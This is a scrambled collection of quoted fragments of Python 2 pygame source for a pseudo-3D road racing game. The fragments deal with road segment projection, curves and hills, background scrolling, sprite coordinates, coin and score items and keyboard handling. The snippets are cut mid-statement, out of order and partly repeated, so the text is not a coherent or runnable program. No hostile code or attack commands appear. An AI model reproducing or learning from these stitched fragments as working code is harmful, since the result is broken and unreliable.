0.0)", "> 500: #print 'scale <1>', scale pass else: try: obj.scale(scale)", "> self.seg_len * 2: if self.tm_start == 0.0: self.tm_start =", "self.size[1] if not keep_segs: self.segments = [] self.rd_sprt_objs = {}", "'grass': '#10AA10', 'rumble': '#555555', 'lane': '#CCCCCC'}, } FP_ROAD = {", "whole: segs = self.segments else: segs = self.segments[:-self.seg_draw_n] return segs", "5, 'y': 495, 'w': 1280, 'h': 480 }, 'TREES': {", "#i = int(math.ceil(pos / self.seg_len)) seg_n = len(self.segments) i =", "* TAB : replay this road * RETURN : go", "1) dx1 = self.seg_len * math.tan(theta1) dx2 = self.seg_len *", "'p_curve', p_curve p_dt = self.speed * p_curve * self.centrifugal #print", "/ self.road.track_len self.prog.progress(prg) spdc = self.road.speed / self.road.speed_max self.spd.progress(spdc) class", "['img_sprts/i_coin1.png'], 'score': 1,}, 'coin5': {'imgs': ['img_sprts/i_coin5.png'], 'score': 5,}, 'coin20': {'imgs':", "-80,}, #'dinof': {'imgs': ['img_sprts/dinof2.png'], 'score': -50,}, 'blobb': {'imgs': ['img_sprts/blobb1.png'], 'score':", "self.key_to_di_b(event.key) if di is not None: e_keys_up.append(di) else: r_events.append(event) elif", "xsl1) / 2.0, (xsr2 + xsl2) / 2.0, xsl1, xsl2]", "r_events = [] for event in events: #print event if", "1.0: a = 1.0 #tht_d = math.acos(a) tht_d = math.asin(a)", "'#10AA10', 'rumble': '#555555', 'lane': '#CCCCCC'}, 'DARK': {'road': '#696969', 'grass': '#009A00',", "self.disp_add(self.bg_trees1) self.bg_trees2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES']) self.bg_trees2.rect.top = 0 self.bg_trees2.rect.left =", "= pygm.SptLbl('hello,', c=consts.GREEN, font_size=32) self.lb1.rect.top = 200 self.lb1.rect.left = 100", "/180.0 * 0.5 theta_i = math.pi /180.0 * 0.9 #theta_i", "r_events.append(event) elif event.type == self.pglc.KEYDOWN: r_events.append(event) else: r_events.append(event) return r_events", "float('inf') #yp = 2 ** 64 yp = yc else:", "= self.xp_to_xs(xpl1, self.w) xpl2 = self.xc_to_xp(xcl2, self.d, zc1) xsl2 =", "5: sprt_at = -1100 #print 'sprt_x', sprt_x #print 'car_x', car_x", "car_x = self.player_x car_w = self.car.rect.width * 2 sprt_at =", "= x_i # x_i_saved = x_i obj.rect.top = 116 -", "= yc - yw2 #print yw1, yw2 xp1 = self.xc_to_xp(xc1,", "dt) def util_increase(self, start, increment, mx): # with looping result", "math.pi /180.0 * 0.5 theta_i = math.pi /180.0 * 0.9", "return (n % total) / total def add_road(self, enter, hold,", "0 self.straight.rect.left = 0 self.disp_add(self.straight) '''' self.sn1 = SptTmpx((200, 200))", "segs, rad): pnts = [] x, y = 0.0, 0.0", "}, 'TRUCK': { 'x': 1365, 'y': 644, 'w': 100, 'h':", "= self.road_w / 2 - self.player_x - curve_d * i", "= float('inf') #xp = 2 ** 64 xp = xc", "0.0) def rd_seg_add(self, curve=0.0, yw=0.0): #print '+', curve, yw n", "ys4, 0, ys3, seg['color']['grass']) self.render_polygon(None, xs1, ys1, xs2, ys2, xs4,", "if zc == 0.0: return 1.0 else: return d /", "(i+1)*self.seg_len zw2 = (i+2)*self.seg_len zc1 = zw1 - self.camera_z -", "10.0#50.0# x += rad_m * math.cos(tht) y += rad_m *", "- self.position zc2 = zw2 - self.camera_z - self.position #zc1", "n is None: #n = seg_n / 20 n =", "'MEDIUM': 50, 'LONG': 100 }, # num segments 'CURVE': {'NONE':", "car_w #print 'sprt_at', (car_x - car_w / 2), sprt_at, (car_x", "40) leave = random.randint(10, 40) if p < 0.3: curve", "xcl2 = xc2 + self.lane_w xcl3 = xc3 - self.lane_w", "yc1 = yc - yw1 yc2 = yc - yw2", "# self.score = 0 self.game_over = True self.game_score = -1.0", "with open(f, 'w') as fo: fo.write(s) def rd_seg_json_load(self, f): with", "/ d for i in range(n): rct = [0, i", "curve else: cv_s = 1 continue x += rad_m *", "ys2 print xs4, ys4, xs3, ys3 print '-' * 30", "'#CCCCCC'}, 'DARK': {'road': '#696969', 'grass': '#009A00', 'rumble': '#BBBBBB' }, 'START':", "yp1 = self.yc_to_yp(yc, self.d, zc1) ys1 = self.yp_to_ys(yp1, self.h) ys2", "= 200 self.lb1.rect.left = 100 self.disp_add(self.lb1) ''' def handle_event(self, events,", "644, 'w': 100, 'h': 78 }, 'CAR03': { 'x': 1383,", "add_curves(self): self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'],", "#sprts = self.player_seg['sprites'] sprts = self.base_seg['sprites'] if not sprts: return", "zc2) xs3 = self.xp_to_xs(xp3, self.w) xp4 = self.xc_to_xp(xc4, self.d, zc2)", "''' #x# if seg['index'] < segbi: zw1 = (i+1)*self.seg_len zw2", "ys1, xs2, ys2, xs4, ys4, xs3, ys3, seg['color']['road']) def rd_seg_render__3_o(self):", "== self.pglc.K_DOWN: return 2 elif k == self.pglc.K_LEFT: return 3", "if di is not None: e_keys_up.append(di) else: r_events.append(event) elif event.type", "= [[x1, y1-d], [x2, y2-d], [x3, y3-d], [x4, y4-d], [x1,", "10) if self.position > self.track_len: self.position -= self.track_len #''' self.draw_on()", "self.c[3] = ca self.pygm.draw.rect(self.surf, self.c, rct) class FPSptRdSprts(pygm.SptImg): def __init__(self,", "self.draw_on() def draw_on(self, *args, **kwargs): #self.fill(self.c) d = 2 n", "'score': 70,}, 'clown': {'imgs': ['img_sprts/clown1.png'], 'score': -100,}, } class SptTmpx(sptdraw.SptDrawBase):", "xp, w): #xs = w / 2.0 + w /", "j = random.randint(10, seg_n - 10) sprt = random.choice(FP_ROAD_SPRTS.keys()) s", "#yp = float('inf') #yp = 2 ** 64 yp =", "2.0 / self.seg_draw_n engi = math.pi / 2.0 / 60#10#20", "not None: try: segs = self.rd_seg_json_load(segs_file) self.segments = segs self.track_len", "road map self.rdmap_hide() elif k == self.pglc.K_RETURN: self.road_reset() elif k", "len(self.segments) segbi = self.get_seg_base_i() #print 'segbi', segbi, ' / ',", "'w': 282, 'h': 295 }, 'BILLBOARD04': { 'x': 1205, 'y':", "self.player_x - curve_d * i xp1 = self.xc_to_xp(xc1, self.d, zc1)", "yw = random.random() * 10.0 else: curve = rl *", "- self.player_x xc4 = -self.road_w / 2 - self.player_x #xcl1", "zw2 - self.camera_z - self.position ''' # for curve xc1", "w): #xs = w / 2.0 + w / 2.0", "self.rdpsd.lbl_set(str(int(self.road.speed))) self.scr.lbl_set(str(int(self.road.score))) self.tm_once.lbl_set(str(int(self.road.tm_last_once))) prg = self.road.position / self.road.track_len self.prog.progress(prg) spdc", "FP_COLOR_BLACK}, 'START_Y': {'road': FP_COLOR_YELLOW, 'grass': '#10AA10', 'rumble': '#555555', 'lane': '#CCCCCC'},", "info.get('obj') ''' # TODO: <1> if not obj: obj =", "'world y', seg['p1']['world'].get('y', 0.0) #print '-' * 30 ''' '''", "(d / zc) return yp def xp_to_xs(self, xp, w): #xs", "= 2.0#4.0#6.0 self.speed_dt_na = 1.0#3.0 self.player_x_dt = 60.0#30.0#20.0 self.last_seg_i =", "rd_seg_init_rand_2(self, n=50): for i in range(n): p = random.random() #print", "2 y_sprt = ys1 scale_sprt = seg_scale * 8.0#10.0#2.0 obj", "#print k, sprt self.disp_del(sprt) del self.rd_sprt_objs[k] def util_limit(self, value, mn,", "obj: self.disp_del(obj) # NOTE: objs will be deleted at rd_sprts_del_all_objs()", "#zw2 = (i+2)*self.seg_len #''' # <1> zw1 = seg['p1']['world']['z'] zw2", "- curve_d * i xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1", "self.segments[j]['sprites'].append(s) def rd_sprts_del_all_objs(self): for k, sprt in self.rd_sprt_objs.items(): #print k,", "k == self.pglc.K_k: return 1 elif k == self.pglc.K_SPACE or", "FP_ROAD['CURVE']['EASY']) else: enter = random.randint(10, 100) hold = random.randint(10, 100)", "'world z', self.player_seg['p1']['world']['z'] #print 'world y', self.player_seg['p1']['world'].get('y', 0.0) # clear", "+ hill.rect.width < 0: hill.rect.left += hill.rect.width * 2 if", "#self.pygm.draw.polygon(self.surf, c, cpnts) self.pygm.draw.lines(self.surf, c, False, cpnts, 3) class FPSptProgress(sptdraw.SptDrawBase):", "score when go out the road if self.player_x < -self.road_w", "utils IMG_POS_BACKGROUND = { 'HILLS': { 'x': 5, 'y': 5,", "= '#00EEEE' FP_COLORS = { 'SKY': '#72D7EE', 'TREE': '#005108', 'FOG':", "math.cos(tht) y += rad_m * math.sin(tht) pnts.append([x, y]) #print pnts", "dx_curve x_curve = x_curve + dx_curve dx_curve = dx_curve +", "self.seg_len)) seg_n = len(self.segments) i = (i + seg_n) %", "= [[x1, y1], [x2, y2], [x3, y3], [x4, y4], [x1,", "0.0) #p_curve = 3 #print 'p_curve', p_curve p_dt = self.speed", "220 }, 'BILLBOARD02': { 'x': 245, 'y': 1262, 'w': 215,", "y2+a], [x3, y3+a], [x4, y4+a], [x1, y1+a]] # reflect the", "'chest': {'imgs': ['img_sprts/i_chest1.png'], 'score': 100,}, 'coin1': {'imgs': ['img_sprts/i_coin1.png'], 'score': 1,},", "= utils.dir_abs(segs_file, __file__) self.road.rd_reset(init=False, keep_segs=False, segs_file=segs_file) self.rdmap_reset() def road_segs_to_file(self, segs_file=None):", "in range(a): self.rd_seg_add(0.0, 0.0) def rd_seg_add(self, curve=0.0, yw=0.0): #print '+',", "if self.player_x < -1000: self.player_di = 1 elif self.player_di ==", "h=30, *args, **kwargs): super(FPSptFog, self).__init__(size) self.c = c self.h =", "in e_keys_dn: self.player_di = 3 if 0 in e_keys_up: if", "- 2, y]) class FPStraight(pygm.PyGMSprite): def __init__(self, cfg, *args, **kwargs):", "= xc1 - self.lane_w #xcl2 = xc2 + self.lane_w #xcl3", "seg['color']['road']) def rd_seg_render__4_o(self): \"\"\"curve\"\"\" #theta_i = math.pi /180.0 * 0.1", "== self.pglc.K_j: return 0 elif k == self.pglc.K_k: return 1", "/180.0 * 0.1 #theta_i = math.pi /180.0 * 0.5 theta_i", "or ROAD['LENGTH']['SHORT'] height = height or ROAD['HILL']['LOW'] self.add_road(num, num, num,", "= -self.road_w / 2 - self.player_x xcl1 = xc1 -", "= kwargs.get('bg_hills') self.bg_trees = kwargs.get('bg_trees') self.clr_dark_road = utils.clr_from_str(FP_COLORS['DARK']['road']) self.clr_dark_grass =", "1 elif k == self.pglc.K_DOWN: return 2 elif k ==", "0: return 0.0 else: return self.segments[seg_n - 1]['p2']['world'].get('y', 0.0) def", "self.player_x - curve_d * i #xc2 = -self.road_w / 2", "}, 'BOULDER1': { 'x': 1205, 'y': 760, 'w': 168, 'h':", "return 2 elif k == self.pglc.K_d: return 3 else: return", "self).__init__(title, winw, winh) bk_im = utils.dir_abs('starfish/data/img_bk_1.jpg', __file__) #self.bk = pygm.SptImg('data/img_bk_1.jpg')", "update_bg(self): # always move the cloud for sky in self.bg_sky:", "self.straight.rect.left = 0 self.disp_add(self.straight) '''' self.sn1 = SptTmpx((200, 200)) self.sn1.rect.top", "> 0: # pnts.append(pnts[0]) cpnts = [self.xy_to_cntr(p[0], p[1]) for p", "(b - a) * math.pow(percent, 2) def util_ease_out(self, a, b,", "hill.rect.width * 2 if hill.rect.left - hill.rect.width > 0: hill.rect.left", "= 70#340 self.prog.rect.left = 610 #self.prog.rotate(180) self.disp_add(self.prog) self.spd = FPSptProgress((4,", "elif event.type == self.pglc.KEYDOWN: di = self.key_to_di(event.key) if di is", "self.add_road(num, num, num, 0, height/2.0) self.add_road(num, num, num, 0, 0)", "self.road_w / 2 - self.player_x #xc4 = -self.road_w / 2", "self.track_len: self.position -= self.track_len #''' self.draw_on() self.rd_seg_render() def refresh(self, fps_clock,", "1280, 'h': 480 }, 'SKY': { 'x': 5, 'y': 495,", "2 for trees in self.bg_trees: trees.rect.left += int(self.tree_speed * p_dt)", "1: xpl1 = self.xc_to_xp(xcl1, self.d, zc1) xsl1 = self.xp_to_xs(xpl1, self.w)", "hill in self.bg_hills: hill.rect.left += int(self.hill_speed * p_dt) if hill.rect.left", "cv_l += curve else: cv_s = 1 continue x +=", "'score': -100,}, #'bear': {'imgs': ['img_sprts/bear2.png'], 'score': -80,}, #'dinof': {'imgs': ['img_sprts/dinof2.png'],", "xcr3 - x_curve - dx_curve xcr4 = xcr4 - x_curve", "ys2, xsl4, ys4, xs4, ys4, seg['color']['rumble']) xpr1 = self.xc_to_xp(xcr1, self.d,", "= (i+1)*self.seg_len zw2 = (i+2)*self.seg_len else: # <1> zw1 =", "= pygm.SptImg(bk_im) self.bk.rect.top = -230 self.bk.rect.left = -230 #self.disp_add(self.bk) self.scn1", "= random.randint(10, 40) if p < 0.3: curve = 0.0", "- self.player_x #xc4 = -self.road_w / 2 - self.player_x #", "+ trees.rect.width < 0: trees.rect.left += trees.rect.width * 2 if", "info.get('x_i') #if not x_i_saved: # info['x_i'] = x_i # x_i_saved", "# clear the sprites cache self.rd_sprt_cache = [] # <1>", "self.e_keys_up) self.draw_on() self.rd_seg_render() self.update_world() self.check_if_car_out_road() self.check_score() self.check_tm() self.update_bg() def check_player_di(self,", "self.seg_len def seg_lasy_y(self): seg_n = len(self.segments) if seg_n == 0:", "'y': 555, 'w': 135, 'h': 332 }, 'BILLBOARD09': { 'x':", "ys3 = self.yp_to_ys(yp3, self.h) ys4 = ys3 #''' #if 1:", "if road_file: self.scn1.straight.road_reset_from_file(segs_file=road_file) def main(): #sf = GMFlatpath('flatpath <:::>', 640,", "FP_COLOR_BLACK = '#000000' FP_COLOR_YELLOW = '#EEEE00' FP_COLOR_BLUE = '#00EEEE' FP_COLORS", "{'world': {'z': (n + 1) * self.seg_len, 'y': self.seg_lasy_y()}, 'camera':", "''' self.lb1 = pygm.SptLbl('hello,', c=consts.GREEN, font_size=32) self.lb1.rect.top = 200 self.lb1.rect.left", "sprt_at = 1100 elif x_i == 5: sprt_at = -1100", "self.player_x xcr4 = -self.lane_w - self.player_x yc = self.camera_h print", "return a + (b - a) * (1 - math.pow(1", "/ 2 - self.player_x xcl1 = xc1 - self.lane_w xcl2", "= GMFlatpath('flatpath <:::>', 640, 480, road_file='sr_road.txt') sf.mainloop() if __name__ ==", "2.0 / 60#10#20 rad = self.road_w * 4#2 rad1 =", "#self.player_x -= p_dt self.player_x += p_dt def check_if_car_out_road(self): # decrease", "= 1.0#3.0 self.player_x_dt = 60.0#30.0#20.0 self.last_seg_i = 0 self.score =", "- self.player_x xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 = self.xp_to_xs(xp1,", "img = FP_ROAD_SPRTS[sprt]['imgs'][0] obj = FPSptRdSprts.create_by_img(img) # avoid: pygame.error: Width", "y] def cv_to_engl(self, curve, rad): a = float(curve) / rad", "*args, **kwargs): pass class GMFlatpath(pygm.PyGMGame): def __init__(self, title, winw, winh,", "= self.get_seg_base_i() #print 'segbi', segbi, ' / ', seg_n self.player_seg", "/ 2.0 - h / 2.0 * yp ys =", "[x1, y1+a]] # reflect the y- d = 116 pnts", "yp3 = self.yc_to_yp(yc2, self.d, zc2) ys3 = self.yp_to_ys(yp3, self.h) ys4", "del self.rd_sprt_objs[k] def util_limit(self, value, mn, mx): return max(mn, min(value,", "segment seg_i = self.player_seg['index'] if seg_i > self.last_seg_i: self.last_seg_i =", "= 2 if 1 in e_keys_dn: self.player_di = 1 elif", "self.seg_len, 'y': self.seg_lasy_y()}, 'camera': {}, 'screen': {}}, 'p2': {'world': {'z':", "seg_n == 0: return #self.segments[0]['color'] = FP_COLORS['START_Y'] #self.segments[2]['color'] = FP_COLORS['START_Y']", "= utils.clr_from_str(color) try: self.pygm.draw.polygon(self.surf, c, pnts) except Exception as e:", "/ 2 - self.player_x xc2 = -self.road_w / 2 -", "= yc - yw1 yc2 = yc - yw2 #print", ">= mx): result -= mx while (result < 0): result", "== 1: #self.player_x += self.player_x_dt self.player_x += self.speed / 5", "self.camera_z - self.position # for curve xc1 = xc1 -", "seg.items(): if k not in ['sprites']: seg_c[k] = v else:", "0.0) yc1 = yc - yw1 yc2 = yc -", "'sr_roads/sr_road_' + str(int(time.time())) + '.txt' segs_file = utils.dir_abs(segs_file, __file__) self.road.rd_seg_json_save(segs_file)", "try: segs = self.rd_seg_json_load(segs_file) self.segments = segs self.track_len = len(self.segments)", "b_percent) x_curve = 0 # <1> #for i, seg in", "or height is too large if scale > 500: #print", "< segbi: zw1 = (i+1)*self.seg_len zw2 = (i+2)*self.seg_len else: #", "(b_curve * b_percent) x_curve = 0 #print 'b_curve', b_curve #print", "'rd_seg_init_rand', n for i in range(n): rl = random.choice([1, -1])", "> self.track_len: self.position -= self.track_len # for check score self.last_seg_i", "self.scn1.straight.road_reset_from_file(segs_file=road_file) def main(): #sf = GMFlatpath('flatpath <:::>', 640, 480) sf", "yw) def rd_seg_init_rand_2(self, n=50): for i in range(n): p =", "235, 'h': 118 }, 'BUSH2': { 'x': 255, 'y': 1097,", "self.xc_to_xp(xc3, self.d, zc2) xs3 = self.xp_to_xs(xp3, self.w) xp4 = self.xc_to_xp(xc4,", "'w': 385, 'h': 265 }, 'TREE1': { 'x': 625, 'y':", "= 70#340 self.spd.rect.left = 602 #self.spd.rotate(180) self.disp_add(self.spd) def rdmap_hide(self): self.rdmap.hide()", "(car_x + w_half): self.score += scr def check_tm(self): if self.position", "sprites * sound \"\"\" import math import random import time", "'BILLBOARD05': { 'x': 5, 'y': 897, 'w': 298, 'h': 190", "= self.player_seg.get('curve', 0.0) #b_percent = 0.5 b_percent = self.util_curve_percent_remaining(self.position, self.seg_len)", "= 600 self.disp_add(self.tm_once) self.prog = FPSptProgress((4, 100), c_prog=consts.YELLOW) self.prog.rect.top =", "= w / 2.0 + xp return xs def yp_to_ys(self,", "0.0 elif self.speed > self.speed_max: self.speed = self.speed_max self.position +=", "c = utils.clr_from_str(FP_COLOR_BLUE) #self.pygm.draw.polygon(self.surf, c, cpnts) self.pygm.draw.lines(self.surf, c, False, cpnts,", "y_sprt, scale_sprt) if obj: self.rd_sprt_cache.append(obj) # render the sprites with", "def check_score(self): # make sure we check score once for", "298, 'h': 190 }, 'BOULDER2': { 'x': 621, 'y': 897,", "test 1\"\"\" #theta_i = math.pi /180.0 * 0.1 #theta_i =", "= 40 #p_dt = -40 #p_dt = random.randint(-100, 100) #print", "self.update_bg() def check_player_di(self, e_keys_dn, e_keys_up): if 0 in e_keys_dn: self.player_go", "(n % total) / total def add_road(self, enter, hold, leave,", "now only use the first sprite ! sprt = sprts[0]", "20,}, 'health': {'imgs': ['img_sprts/i_health.png'], 'score': 10,}, 'heart': {'imgs': ['img_sprts/i_heart.png'], 'score':", "{ 'x': 5, 'y': 985, 'w': 1280, 'h': 480 },", "FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY']) self.bg_sky1.rect.top = 0 self.bg_sky1.rect.left = 0 self.disp_add(self.bg_sky1) self.bg_sky2", "{'NONE': 0, 'EASY': 2, 'MEDIUM': 4, 'HARD': 6 }, 'HILL':", "#x# if seg['index'] < segbi: zw1 = (i+1)*self.seg_len zw2 =", "{ 'x': 5, 'y': 1262, 'w': 230, 'h': 220 },", "i, seg in enumerate(self.segments): # <2> for i in range(self.seg_draw_n):", "<:::>', 640, 480) sf = GMFlatpath('flatpath <:::>', 640, 480, road_file='sr_road.txt')", "'#6B6B6B', 'grass': '#10AA10', 'rumble': '#555555', 'lane': '#CCCCCC'}, 'DARK': {'road': '#696969',", "3 else: return None def check_key(self, events): #print id(events) r_events", "self.tm_last_once = 0.0 self.sky_speed = 0.1#0.05# self.hill_speed = 0.2#0.1# self.tree_speed", "hill.rect.width * 2 for trees in self.bg_trees: trees.rect.left += int(self.tree_speed", "- self.player_x - curve_d * i #xc4 = -self.road_w /", "#print a s = 1.0 if a < 0.0: s", "not keep_segs: self.segments = [] self.rd_sprt_objs = {} self.rd_sprt_cache =", "math.cos(engi * i) xx2 = rad2 * math.cos(engi * i)", "if not sprts: return # NOTE: we now only use", "def draw_on(self, *args, **kwargs): self.fill(consts.GREEN) self.pygm.draw.circle(self.surf, consts.WHITE, (self.size[0] / 2,", "d / zc def xc_to_xp(self, xc, d, zc): if zc", "/ self.seg_len)) seg_n = len(self.segments) i = (i + seg_n)", "% self.seg_len) zc2 = zw2 - self.camera_z - (self.position %", "obj def handle_event(self, events, *args, **kwargs): #print '>>> ', events", "+ sprt_w / 2 #if (car_x + car_w / 2)", "sky.rect.left -= sky.rect.width * 2 for hill in self.bg_hills: hill.rect.left", "id(events) r_events = [] e_keys_up = [] e_keys_dn = []", "rad_m = 0.5#1.0#0.1# else: if cv_s: cv_l += curve else:", "accel, dt): return v + (accel * dt) def util_increase(self,", "TODO: <1> if not obj: obj = FPSptRdSprts.create_by_img(FP_ROAD_SPRTS[sprt][0]) info['obj'] =", "use the first sprite ! sprt = sprts[0] x_i =", "return a + (b - a) * math.pow(percent, 2) def", "= xcr3 - x_curve - dx_curve xcr4 = xcr4 -", "0.35: self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['MEDIUM']) elif p <", "xc2 - x_curve xc3 = xc3 - x_curve - dx_curve", "rd_seg_render__4_o(self): \"\"\"curve\"\"\" #theta_i = math.pi /180.0 * 0.1 #theta_i =", "sky.rect.left += int(self.sky_speed * p_dt) # always move the cloud", "500: #print 'scale <1>', scale pass else: try: obj.scale(scale) except:", "- self.player_x xc4 = -self.road_w / 2 - self.player_x xcl1", "= -self.road_w / 2 - self.player_x #xcl1 = xc1 -", "# 3, 0) # render road sprites # TODO: check", "= sprt.get('x_i') if x_i is None: return scr = sprt.get('score')", "self.yw = 0.0 self.zw = 0.0 self.xc = 0.0 self.yc", "{ 'x': 1205, 'y': 490, 'w': 150, 'h': 260 },", "e_keys_dn = [] for event in events: #print event if", "tht_d = math.asin(a) # TODO: tht += tht_d rad_m =", "kwargs.get('bg_trees') self.clr_dark_road = utils.clr_from_str(FP_COLORS['DARK']['road']) self.clr_dark_grass = utils.clr_from_str(FP_COLORS['DARK']['grass']) self.rd_reset(init=True) self.add_fog() def", "'w': 168, 'h': 248 }, 'BUSH1': { 'x': 5, 'y':", "print xs1, ys1, xs2, ys2 print xs4, ys4, xs3, ys3", "FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['EASY']) else: enter = random.randint(10, 100) hold", "{'road': FP_COLOR_WHITE, 'grass': FP_COLOR_WHITE, 'rumble': FP_COLOR_WHITE}, 'FINISH': {'road': FP_COLOR_BLACK, 'grass':", "'START_Y': {'road': FP_COLOR_YELLOW, 'grass': '#10AA10', 'rumble': '#555555', 'lane': '#CCCCCC'}, }", "num, 0, height/2.0) self.add_road(num, num, num, 0, -height) self.add_road(num, num,", "event.key if k == self.pglc.K_SPACE: # hide / show road", "y1], [x2, y2], [x3, y3], [x4, y4], [x1, y1]] #pnts", "def add_low_rolling_hills(self, num, height): num = num or ROAD['LENGTH']['SHORT'] height", "+ self.road_w / 2 rad2 = rad - self.road_w /", "self.xc_to_xp(xc2, self.d, zc1) xs2 = self.xp_to_xs(xp2, self.w) xp3 = self.xc_to_xp(xc3,", "self.d, zc1) xs2 = self.xp_to_xs(xp2, self.w) xp3 = self.xc_to_xp(xc3, self.d,", "1262, 'w': 215, 'h': 220 }, 'STUMP': { 'x': 995,", "self.prog.rect.left = 610 #self.prog.rotate(180) self.disp_add(self.prog) self.spd = FPSptProgress((4, 100), c_prog=consts.GREEN)", "'CAR02': { 'x': 1383, 'y': 825, 'w': 80, 'h': 59", "self.track_len #''' self.draw_on() self.rd_seg_render() def refresh(self, fps_clock, *args, **kwargs): self.check_player_di(self.e_keys_dn,", "(b - a) * (1 - math.pow(1 - percent, 2))", "dx_curve dx_curve = dx_curve + seg.get('curve', 0.0) xp1 = self.xc_to_xp(xc1,", "''' def handle_event(self, events, *args, **kwargs): return events def refresh(self,", "self.c_prog = c_prog self.progress(0.0) def progress(self, prog): y = self.size[1]", "segs self.track_len = len(self.segments) * self.seg_len except Exception as e:", "/ animate / ... 'obj': None, # need to create", "'heart': {'imgs': ['img_sprts/i_heart.png'], 'score': 50,}, 'pot1': {'imgs': ['img_sprts/i_pot1.png'], 'score': -5,},", "theta_i * i theta2 = theta_i * (i + 1)", "c=consts.GREEN, font_size=32) self.lb1.rect.top = 200 self.lb1.rect.left = 100 self.disp_add(self.lb1) '''", "-self.road_w / 2 - self.player_x #xc3 = self.road_w / 2", "[] for event in events: #print event if event.type ==", "*args, **kwargs): super(FPSptBg, self).__init__(img_file, pos) class FPSptSprts(pygm.SptImgOne): def __init__(self, img_file,", "if cv_s: cv_l += curve else: cv_s = 1 continue", "self.segments[segbi] self.base_seg = self.segments[(segbi + 2) % seg_n] # for", "continue x += rad_m * math.cos(tht) y += rad_m *", "n if n % 2 == 0: #if n %", "= rad + self.road_w / 2 rad2 = rad -", "seg_n = len(self.segments) if n is None: #n = seg_n", "else: return d / zc def xc_to_xp(self, xc, d, zc):", "def yc_to_yp(self, yc, d, zc): if zc == 0.0: #yp", "self.sn1.rect.top = 100 self.sn1.rect.left = 100 self.disp_add(self.sn1) ''' ''' self.lb1", "self.player_x -= self.speed / 5 + 20 else: pass p_curve", "return 3 else: return None def key_to_di_b(self, k): if k", "draw_on(self, *args, **kwargs): self.fill(consts.GREEN) self.pygm.draw.circle(self.surf, consts.WHITE, (self.size[0] / 2, self.size[1]", "ys def rd_seg_init(self, a=500): for n in range(a): self.rd_seg_add(0.0, 0.0)", "1: self.player_di = 0 def update_world(self): if self.player_go == 1:", "+= int(self.hill_speed * p_dt) if hill.rect.left + hill.rect.width < 0:", "self.size[0] / 2, 0) class SptTmpi(pygm.SptImg): def __init__(self, img_file, *args,", "self).__init__(size) self.c = c self.h = h self.draw_on() def draw_on(self,", "self.seg_len)) #i = int(math.ceil(pos / self.seg_len)) seg_n = len(self.segments) i", "xx3) - self.player_x xc4 = (rad - xx4) - self.player_x", "- self.lane_w #xcl4 = xc4 + self.lane_w xcr1 = self.lane_w", "test if i < 10: print xs1, ys1, xs2, ys2", "+ '_' + str(i) + '_' + sprt obj =", "xsl1) / 2.0 #x_sprt = random.choice(x_pos) x_i = random.randint(0, len(x_pos)", "elif k == self.pglc.K_d: return 3 else: return None def", "sound \"\"\" import math import random import time from starfish", "utils.dir_abs(segs_file, __file__) self.road.rd_reset(init=False, keep_segs=False, segs_file=segs_file) self.rdmap_reset() def road_segs_to_file(self, segs_file=None): if", "# None or 0 return #rd_w_half = self.road_w / 2", "= self.segments else: segs = self.segments[:-self.seg_draw_n] return segs # ####", "= FPSptSprts('img_flatpath/images/sprites.png', IMG_POS_SPRITES['PLAYER_STRAIGHT']) #print self.road.cameraDepth/self.road.playerZ #self.car.scale(self.road.cameraDepth/self.road.playerZ) self.car.scale(2) self.car.rect.top = 400", "= event.key if k == self.pglc.K_SPACE: # hide / show", "FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills2.rect.top = 0 self.bg_hills2.rect.left = self.bg_hills1.rect.width self.disp_add(self.bg_hills2) self.bg_trees1", "#obj.scale(scale) info['obj'] = obj ##self.disp_add(obj) # NOTE: render out here", "'y': 310, 'w': 268, 'h': 170 }, 'DEAD_TREE2': { 'x':", "- 10) * seg_scale #x_sprt = (xs1 + xs2) /", "/ 2 - self.player_x yc = self.camera_h print '=' *", "x_pos 'x_i': random.randint(0, 4), 'score': FP_ROAD_SPRTS[sprt].get('score', 0), } self.segments[j]['sprites'].append(s) def", "= [] x, y = 0.0, 0.0 tht = 0.0", "'score': 100,}, 'coin1': {'imgs': ['img_sprts/i_coin1.png'], 'score': 1,}, 'coin5': {'imgs': ['img_sprts/i_coin5.png'],", "n/leave), self.util_ease_out(start_y, end_y, (float(n)+enter+hold)/total)) def add_curves(self): self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY'])", "xcl3 = xc3 - self.lane_w xcl4 = xc4 + self.lane_w", "3 if 0 in e_keys_up: if self.player_go != 2: self.player_go", "}, 'BILLBOARD01': { 'x': 625, 'y': 375, 'w': 300, 'h':", "only show one break return obj def handle_event(self, events, *args,", "return 0 elif k == self.pglc.K_k: return 1 elif k", "out the road if self.player_x < -self.road_w / 2 or", "FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], 0.0) def add_low_rolling_hills(self, num, height):", "# < self.player_x -= 9 if self.player_x < -1000: self.player_di", "leave = random.randint(10, 40) curve = rl * random.random() *", "= 0 self.game_over = True self.game_score = -1.0 def check_score(self):", "'score': -50,}, 'chick_fly': {'imgs': ['img_sprts/chick_fly3.png'], 'score': 70,}, 'clown': {'imgs': ['img_sprts/clown1.png'],", "= -self.road_w / 2 - self.player_x #xc3 = self.road_w /", "x_curve xcr3 = xcr3 - x_curve - dx_curve xcr4 =", "**kwargs): #return events r_events = [] for event in events:", "- (b_curve * b_percent) x_curve = 0 # <1> #for", "if a < 0.0: s = -1.0 if a <", "self.player_seg = None self.base_seg = None # the segment just", 